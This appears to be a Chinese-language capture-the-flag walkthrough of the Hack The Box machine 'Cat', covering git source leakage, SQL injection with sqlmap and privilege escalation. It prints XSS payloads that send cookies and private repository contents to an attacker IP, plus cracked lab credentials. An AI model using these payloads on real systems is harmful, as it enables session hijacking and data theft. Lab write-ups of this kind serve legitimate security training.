Cat

10.10.11.53

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# Nmap 7.95 scan initiated Sat Apr 19 15:15:24 2025 as: nmap -e utun4 -sC -sV -vv -oA nmap/default 10.10.11.53
Nmap scan report for 10.10.11.53
Host is up, received reset ttl 63 (0.12s latency).
Scanned at 2025-04-19 15:15:37 CST for 15s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/7/gBYFf93Ljst5b58XeNKd53hjhC57SgmM9qFvMACECVK0r/Z11ho0Z2xy6i9R5dX2G/HAlIfcu6i2QD9lILOnBmSaHZ22HCjjQKzSbbrnlcIcaEZiE011qtkVmtCd2e5zeVUltA9WCD69pco7BM29OU7FlnMN0iRlF8u962CaRnD4jni/zuiG5C2fcrTHWBxc/RIRELrfJpS3AjJCgEptaa7fsH/XfmOHEkNwOL0ZK0/tdbutmcwWf9dDjV6opyg4IK73UNIJSSak0UXHcCpv0GduF3fep3hmjEwkBgTg/EeZO1IekGssI7yCr0VxvJVz/Gav+snOZ/A1inA5EMqYHGK07B41+0rZo+EZZNbuxlNw/YLQAGuC5tOHt896wZ9tnFeqp3CpFdm2rPGUtFW0jogdda1pRmRy5CNQTPDd6kdtdrZYKqHIWfURmzqva7byzQ1YPjhI22cQ49M79A0yf4yOCPrGlNNzeNJkeZM/LU6p7rNJKxE9CuBAEoyh0=
|   256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEmL+UFD1eC5+aMAOZGipV3cuvXzPFlhqtKj7yVlVwXFN92zXioVTMYVBaivGHf3xmPFInqiVmvsOy3w4TsRja4=
|   256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEOCpb672fivSz3OLXzut3bkFzO4l6xH57aWuSu4RikE
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://cat.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /opt/homebrew/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 19 15:15:52 2025 -- 1 IP address (1 host up) scanned in 28.17 seconds

cat.htb 添加到 hosts

git 泄漏

git-disclosure
git-disclosure

使用 GitHack 下载源码

源码审计

XSS

view-cat
view-cat

管理员查看待审核猫咪页面中不存在对 username 字段的过滤,此处存在 XSS
register
开启监听,登陆后上传图片获取管理员 cookie
cookie

SQL注入

sql-join
accept_cat.php 中存在直接拼接 sql 执行,sqlmap 启动 

1
$ sqlmap -r accept.req -p catName --dbms=SQLite --level=5 --risk=3 --batch
sqlmap
sqlmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
+---------+-------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------+
| user_id | email                         | password                         | username                                                                                                                     |
+---------+-------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------+
| 1       | [email protected]            | d1bbba3670feb9435c9841e46e60ee2f | axel                                                                                                                         |
| 2       | [email protected]      | ac369922d560f17d6eeb8b2c7dec498c | rosa                                                                                                                         |
| 3       | [email protected] | 42846631708f69c00ec0c0a8aa4a92ad | robert                                                                                                                       |
| 4       | [email protected] | 39e153e825c4a3d314a0dc7f7475ddbe | fabian                                                                                                                       |
| 5       | [email protected]        | 781593e060f8d065cd7281c5ec5b4b86 | jerryson                                                                                                                     |
| 6       | [email protected]          | 1b6dce240bbfbc0905a664ad199e18f8 | larry                                                                                                                        |
| 7       | [email protected]     | c598f6b844a36fa7836fba0835f1f6   | royer                                                                                                                        |
| 8       | [email protected]          | e41ccefa439fc454f7eadbf1f139ed8a | peter                                                                                                                        |
| 9       | [email protected]           | 24a8ec003ac2e1b3c5953a6f95f8f565 | angel                                                                                                                        |
| 10      | [email protected]          | 88e4dceccd48820cf77b5cf6c08698ad | jobert                                                                                                                       |
| 11      | 3334                          | e10adc3949ba59abbe56e057f20f883e | <script>var xhr=new XMLHttpRequest();xhr.open('GET','http://10.10.16.24:8001/?re'+document.cookie,true);xhr.send();</script> |
+---------+-------------------------------+----------------------------------+------------------------------------------------------------------------------------------------------------------------------+
crackstation
crackstation

获得凭据 rosa:soyunaprincesarosa 成功登陆 ssh

linpeas.sh

running by rosa

group
group

rosa 在 adm 组,可以查看 apache 日志
apache
GET 参数传参的后果。获得凭据 axel:aNdZwgC4tI9gnVXv_e3Q,可以登陆 ssh

ports

ports-result
ports-result

3000 端口有一个 gitea

running by axel

crontab
crontab

sendmail
sendmail 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Message-Id: <[email protected]>
Subject: New cat services

Hi Axel,

We are planning to launch new cat-related web services, including a cat care website and other projects. Please send an email to jobert@localhost with information about your Gitea repository. Jobert will check if it is a promising service that we can develop.

Important note: Be sure to include a clear description of the idea so that I can understand it properly. I will review the whole repository.

From [email protected]  Sat Sep 28 05:05:28 2024
Return-Path: <[email protected]>
Received: from cat.htb (localhost [127.0.0.1])
        by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S55SRY002268
        for <[email protected]>; Sat, 28 Sep 2024 05:05:28 GMT
Received: (from rosa@localhost)
        by cat.htb (8.15.2/8.15.2/Submit) id 48S55Sm0002267
        for axel@localhost; Sat, 28 Sep 2024 05:05:28 GMT
Date: Sat, 28 Sep 2024 05:05:28 GMT
From: [email protected]
Message-Id: <[email protected]>
Subject: Employee management

We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Employee-management/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md.

:3000 gitea

rosa:soyunaprincesarosa 无法登陆
axel:aNdZwgC4tI9gnVXv_e3Q 可以登陆,但是没有仓库
gitea 1.22.0 存在 XSS https://www.exploit-db.com/exploits/52077
由前面的邮件内容提示,构造 payload 仓库发邮件给 jobert 

1
2
3
<!-- 修改仓库 description 为一下内容 -->
<a href='javascript:fetch("http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md").then(response=>response.text()).then(data=>fetch("http://10.10.16.24:8001/?d="+encodeURICo
mponent(btoa(unescape(encodeURIComponent(data))))));'>SAFE</a>
1
2
# 将邮件发送给 jobert@localhost
$ echo "http://localhost:3000/axel/test" | sendmail jobert@localhost

即可读取到 http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md 的内容
content-encoded

content-decoded
content-decoded
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
// http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php
<?php
$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';

if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) || 
    $_SERVER['PHP_AUTH_USER'] != $valid_username || $_SERVER['PHP_AUTH_PW'] != $valid_password) {
    
    header('WWW-Authenticate: Basic realm="Employee Management"');
    header('HTTP/1.0 401 Unauthorized');
    exit;
}

header('Location: dashboard.php');
exit;

提权

使用 gitea 源码发现的密码 IKw75eR0MR7CMIxhH0 成功 su -

总结

git 泄漏源码,XSS 获取漏洞接口的访问权限,SQL 注入获取 rosa 用户密码,adm 用户组读取包含 GET 传参登陆接口的日志获取 axel 用户密码到达 user shell。
gitea 存在 XSS 读取仓库源码得到 admin 密码到达 root shell。